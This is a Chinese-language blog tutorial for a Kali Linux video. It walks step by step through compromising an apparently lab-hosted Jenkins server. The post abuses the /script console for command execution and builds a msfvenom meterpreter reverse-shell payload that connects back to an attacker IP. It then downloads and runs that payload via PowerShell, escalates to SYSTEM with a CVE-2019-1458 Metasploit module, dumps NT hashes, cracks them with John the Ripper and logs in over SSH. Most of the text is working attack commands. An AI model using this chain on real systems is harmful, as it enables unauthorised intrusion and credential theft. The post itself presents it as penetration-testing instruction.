【视频讲解】Kali Linux入门——如何破解密码

相关阅读

上期视频

破解密码相关内容

之前NetworkChuck带来的hashcat教程

猪猪又对hashcat做了补充,教大家如何通过hashcat破解office文档密码

反弹shell

工具与环境准备

你可以使用Kali linux自带的Metasploit渗透框架,也可以在windows上安装(推荐前者)

视频讲解

本期视频将以Jenkins脚本执行的漏洞为例,教大家如何在控制台完成反弹shell和权限提升,导出密码散列,最终通过john the ripper完成密码破解

图文讲解

使用Nmap进行信息收集

我们可以尝试对某个网段或者某个IP地址进行扫描

当然,在不考虑时间和性能的情况下,你也可以简单粗暴的

nmap 192.168.0.110
图片[1]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

背景知识:Jenkins

Jenkins是开源CI&CD软件领导者, 提供超过1000个插件来支持构建、部署、自动化, 满足任何项目的需要。

图片[2]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog
Jenkins是一个开源软件平台

我们访问Jenkins的/script路径

可以看到这里有个脚本调试的地方,可以输入脚本

图片[3]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

譬如我们输入

println new ProcessBuilder("cmd.exe","/C whoami").redirectErrorStream(true).start().text
图片[4]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后我们可以看到返回值是

nt autority\local service
图片[5]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

这证明我们的脚本执行成功了,而且返回了windows电脑里cmd上显示的我们现在所处的用户组信息,当然还可以将whoami改为ipconfig,然后我们就可以看到返回的一些网络路由信息。

图片[6]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

我们这时可以将上面的实验再继续延伸,我们可以使用metasploit渗透框架

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=4321 -f exe > hackerloix64.exe
图片[7]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

我们可以通过Jenkins脚本执行的控制台下载我们刚刚生成的exe文件,看看能不能有新的玩法!

我们通过命令将文件下载下来

图片[8]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后启动metasploit渗透框架

sudo msfconsole
图片[9]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后开始监听

use exploit/multi-handler

设置对应的payload

 set payload/windows/x64/meterpreter/reverse_tcp
图片[10]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后设置好IP和端口

set LHOST 192.168.0.192
set LPORT 4321

最后运行

run
图片[11]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后在刚才的Jenkins脚本执行的控制台运行,点击Run

  • 下载脚本
println new ProcessBuilder("powershell.exe","Invoke-WebRequest -Uri 'http://192.168.0.192:80/hackerloix64.exe' -Output 'C:\\Program Files\\jenkins\\Scripts\\hackaloix64.exe').redirectErrorStream(true).start().text
  • 利用脚本(如果已经下载可以直接利用
println new ProcessBuilder("hackerloix64.exe").redirectErrorStream(true).start().text
图片[12]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

一旦运行,我们在监听器里就可以看到已经连接上windows电脑的cmd了,我们可以输入相关的命令,譬如

getuid
图片[13]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog
输入getuid来获取用户组信息

当然,你还可以输入

getprivs
图片[14]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog
输入getprivs获取用户现有的权限

权限提升

我们会发现这里导出密码权限是不足的,因此我们需要进行提权

图片[15]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

我们输入下面的命令

session -i 1
ps

看看能不能通过转移来提升权限

migrate 488
图片[16]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

发现也不可以

图片[17]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

这时我们使用metasploit的提权功能

use post/multi/recon/local_exploit_suggester
set SESSION 1
run -j
图片[18]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

发现有可疑利用的漏洞!我们复制下来exploit/windows/local/cve_2019_1458_wizardopium,然后输入下面命令

use exploit/windows/local/cve_2019_1458_wizardopium

输入show options看下,如果没设置IP和端口要设置

set LHOST 192.168.0.192
set LPORT 4444

因为我们之前已经设置了这里就不再设置

图片[19]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后输入下面的命令

set SESSION 1
run -j

这里看到会话2被打开了

图片[20]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

这里输入sessions进行查看,看到权限已经不再是Local了,而是System管理员了

图片[21]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

那我们现在就可以导出密码了

use post/windows/gather/hashdump
set SESSION 2
run
图片[22]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

密码破解

有了这么多密码之后应该怎么做呢?

图片[23]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

我们将上面的密码存储到tobecracked.txt文件里

然后使用john the rapper进行密码破解

john --format=NT ./tobecracked.txt
图片[24]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后显示破解结果

john --format=NT ./tobecracked.txt --show
图片[25]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

我们这里可以看到账户和对应的密码均为vagrant

图片[26]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

为了验证账户密码是正确的,我们通过ssh连接192.168.0.110进行测试

ssh vagrant@192.168.0.110
图片[27]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

然后在隐藏的位置输入密码(Linux密码输入的时候不会显示****,因此不要以为自己没输入上

最终发现可以成功连接

图片[28]-【视频讲解】Kali Linux入门——如何破解密码-FancyPig's blog

本期视频到此结束!请记得一定要摒弃弱口令,更换密码强度高一些的密码!

© 版权声明
THE END
喜欢就支持一下吧
点赞24赞赏 分享
评论 共3条

请登录后发表评论